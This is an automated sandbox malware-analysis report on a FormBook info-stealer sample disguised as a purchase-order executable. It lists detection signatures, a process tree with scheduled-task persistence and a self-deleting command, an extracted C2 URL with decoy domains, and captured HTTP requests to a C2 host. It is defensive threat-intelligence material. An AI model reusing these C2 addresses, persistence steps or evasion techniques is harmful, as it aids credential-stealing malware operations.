Windows Analysis Report PO07262021.exe

Overview

General Information

Sample Name: PO07262021.exe
Analysis ID: 458795
MD5: 47a679ec6799a5a2c9212de73d404a83
SHA1: d21c87a07b4701ddf3206aeb534d010dd928116b
SHA256: c2e765b8a42432e042da5c444bdba20b8021bd5e1b022693978b6540fdbddec7
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • PO07262021.exe (PID: 6688 cmdline: 'C:\Users\user\Desktop\PO07262021.exe' MD5: 47A679EC6799A5A2C9212DE73D404A83)
    • schtasks.exe (PID: 960 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO07262021.exe (PID: 4780 cmdline: C:\Users\user\Desktop\PO07262021.exe MD5: 47A679EC6799A5A2C9212DE73D404A83)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 7024 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6808 cmdline: /c del 'C:\Users\user\Desktop\PO07262021.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cryptoinhindi.online/nmks/"], "decoy": ["sunaoto.net", "uddeshyaheen.com", "memesyndicste.com", "wellnessbytanyabawa.com", "winabeel.com", "santabirria.com", "whatmattersindia.com", "3rdimultimedia.com", "koukismile.com", "hellobabymoccs.com", "marziehmakeup.com", "faiyou.com", "redbarnprovisions.com", "odmgl.com", "usevino.xyz", "csyczp.com", "gutfeelings.club", "coscos.xyz", "moodoo.icu", "thedarktechnician.com", "weebwrld.com", "wilsonmantels.com", "biodrains.com", "banqutstaff.com", "solomonislandsforum.com", "yolo-wear.com", "everylastdropinc.com", "dayblindstarstrategies.com", "freelancersarabia.com", "bellasnicolejewelrymd.com", "oscarh.net", "actevate.xyz", "apa168.com", "paintonpurposeofficial.com", "hrvatskepraviceblog.com", "tednme.com", "truverity.study", "militarynotary.com", "advancedhorticulture.com", "bookmyfreelancer.online", "nieght.com", "yabancidiziozetleri.net", "bkoclchain.com", "ahwaday.com", "yandex-deliverry.online", "electronichaven.today", "islamidesign.com", "lagerungen.com", "uneducatedbyamerica.com", "78500605.xyz", "taichiforwellbeingonline.com", "philipsima.com", "ezljdah.com", "auserconsulting.com", "finrowacademy.com", "securitybyicon.com", "craveroots.com", "ppneumatic.com", "neiretec.com", "amazonemea.xyz", "3dpraclabs-virtual-physics.com", "fitnesstrainingco.com", "brsconsortuimltd.com", "rapiddist.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.PO07262021.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.2.PO07262021.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
7.2.PO07262021.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
7.2.PO07262021.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.2.PO07262021.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration identical to the one listed under Malware Configuration)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe, ReversingLabs: Detection: 73%
Multi AV Scanner detection for submitted file
Source: PO07262021.exe, Virustotal: Detection: 58%
Source: PO07262021.exe, ReversingLabs: Detection: 73%
Yara detected FormBook
Source: Yara match, File source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: PO07262021.exe, Joe Sandbox ML: detected
Source: 7.2.PO07262021.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: PO07262021.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: PO07262021.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.752806137.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: PO07262021.exe, 00000007.00000002.767621920.0000000001190000.00000040.00000001.sdmp, cmd.exe, 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
Source: Binary string: cmd.pdbUGP source: PO07262021.exe, 00000007.00000002.768387188.00000000014E0000.00000040.00000001.sdmp, cmd.exe, 0000000F.00000000.765256590.00000000011D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: PO07262021.exe, 00000007.00000002.767621920.0000000001190000.00000040.00000001.sdmp, cmd.exe
Source: Binary string: cmd.pdb source: PO07262021.exe, 00000007.00000002.768387188.00000000014E0000.00000040.00000001.sdmp, cmd.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.752806137.0000000005A00000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011F31DC FindFirstFileW,FindNextFileW,FindClose,15_2_011F31DC
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011D85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_011D85EA
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011E245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_011E245C
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011DB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_011DB89C
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011E68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_011E68BA
Source: C:\Users\user\Desktop\PO07262021.exe, Code function: 4x nop then pop ebx 7_2_00407AFE

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.cryptoinhindi.online/nmks/
Source: global traffic, HTTP traffic detected: GET /nmks/?6latBtaX=AODdElP/LvmD82bfBWBMQGTCd+0C8NCj5PjqI400wXLHipc47/wHi7nKSi/3AqembaQc&v2M=nRRXGl0p HTTP/1.1 Host: www.winabeel.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /nmks/?6latBtaX=AODdElP/LvmD82bfBWBMQGTCd+0C8NCj5PjqI400wXLHipc47/wHi7nKSi/3AqembaQc&v2M=nRRXGl0p HTTP/1.1 Host: www.winabeel.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown, DNS traffic detected: queries for: www.winabeel.com

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: PO07262021.exe, Lens.cs, Long String: Length: 10292
Source: C:\Users\user\Desktop\PO07262021.exe, Code function: 7_2_00419D60 NtCreateFile,7_2_00419D60
Source: C:\Users\user\Desktop\PO07262021.exe, Code function: 7_2_00419E10 NtReadFile,7_2_00419E10
Source: C:\Users\user\Desktop\PO07262021.exe, Code function: 7_2_00419E90 NtClose,7_2_00419E90
Source: C:\Users\user\Desktop\PO07262021.exe, Code function: 7_2_00419F40 NtAllocateVirtualMemory,7_2_00419F40
Source: C:\Users\user\Desktop\PO07262021.exe, Code function: 7_2_00419E8B NtClose,7_2_00419E8B
Source: C:\Users\user\Desktop\PO07262021.exe, Code function: 7_2_00419F3D NtAllocateVirtualMemory,7_2_00419F3D
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011F6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,15_2_011F6D90
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011FB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,15_2_011FB5E0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011DB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,15_2_011DB42E
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011D84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,15_2_011D84BE
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011D58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,15_2_011D58A4
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011DB4C0 NtQueryInformationToken,15_2_011DB4C0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011DB4F8 NtQueryInformationToken,NtQueryInformationToken,15_2_011DB4F8
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011D83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,15_2_011D83F2
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011F9AB4 NtSetInformationFile,15_2_011F9AB4
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9780 NtMapViewOfSection,LdrInitializeThunk,15_2_03AA9780
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9FE0 NtCreateMutant,LdrInitializeThunk,15_2_03AA9FE0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9710 NtQueryInformationToken,LdrInitializeThunk,15_2_03AA9710
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_03AA96E0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA96D0 NtCreateKey,LdrInitializeThunk,15_2_03AA96D0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9A50 NtCreateFile,LdrInitializeThunk,15_2_03AA9A50
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA99A0 NtCreateSection,LdrInitializeThunk,15_2_03AA99A0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA95D0 NtClose,LdrInitializeThunk,15_2_03AA95D0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_03AA9910
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9540 NtReadFile,LdrInitializeThunk,15_2_03AA9540
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9860 NtQuerySystemInformation,LdrInitializeThunk,15_2_03AA9860
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9840 NtDelayExecution,LdrInitializeThunk,15_2_03AA9840
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA97A0 NtUnmapViewOfSection,15_2_03AA97A0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AAA3B0 NtGetContextThread,15_2_03AAA3B0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9730 NtQueryVirtualMemory,15_2_03AA9730
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9B00 NtSetValueKey,15_2_03AA9B00
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AAA710 NtOpenProcessToken,15_2_03AAA710
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9760 NtOpenProcess,15_2_03AA9760
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9770 NtSetInformationFile,15_2_03AA9770
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AAA770 NtOpenThread,15_2_03AAA770
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9A80 NtOpenDirectoryObject,15_2_03AA9A80
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9A20 NtResumeThread,15_2_03AA9A20
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9A00 NtProtectVirtualMemory,15_2_03AA9A00
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9610 NtEnumerateValueKey,15_2_03AA9610
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9A10 NtQuerySection,15_2_03AA9A10
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9660 NtAllocateVirtualMemory,15_2_03AA9660
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9670 NtQueryInformationProcess,15_2_03AA9670
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9650 NtQueryValueKey,15_2_03AA9650
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA95F0 NtQueryInformationFile,15_2_03AA95F0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA99D0 NtCreateProcessEx,15_2_03AA99D0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9520 NtWaitForSingleObject,15_2_03AA9520
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AAAD30 NtSetContextThread,15_2_03AAAD30
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9560 NtWriteFile,15_2_03AA9560
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9950 NtQueueApcThread,15_2_03AA9950
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA98A0 NtWriteVirtualMemory,15_2_03AA98A0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA98F0 NtReadVirtualMemory,15_2_03AA98F0
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_03AA9820 NtEnumerateKey,15_2_03AA9820
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011E6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,15_2_011E6550
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_011E374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,15_2_011E374E
          Source: PO07262021.exe, 00000000.00000000.642212993.00000000006D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamecAlternateFileNameeFixedBuff.exe2 vs PO07262021.exe
          Source: PO07262021.exe, 00000007.00000002.768168332.000000000143F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO07262021.exe
          Source: PO07262021.exe, 00000007.00000002.766354813.0000000000792000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamecAlternateFileNameeFixedBuff.exe2 vs PO07262021.exe
          Source: PO07262021.exe, 00000007.00000002.768464422.000000000152D000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs PO07262021.exe
          Source: PO07262021.exeBinary or memory string: OriginalFilenamecAlternateFileNameeFixedBuff.exe2 vs PO07262021.exe
          Source: PO07262021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: PO07262021.exe, Shelf_itemm.cs Base64 encoded string
          Source: PO07262021.exe, Lens.cs Base64 encoded string
          Source: PO07262021.exe, NotifactionMSG.cs Base64 encoded string
          Source: PO07262021.exe, ThemeContainer.cs Base64 encoded string
          Source: PO07262021.exe, YouPLayer.cs Base64 encoded string
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@2/1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,15_2_011DC5CA
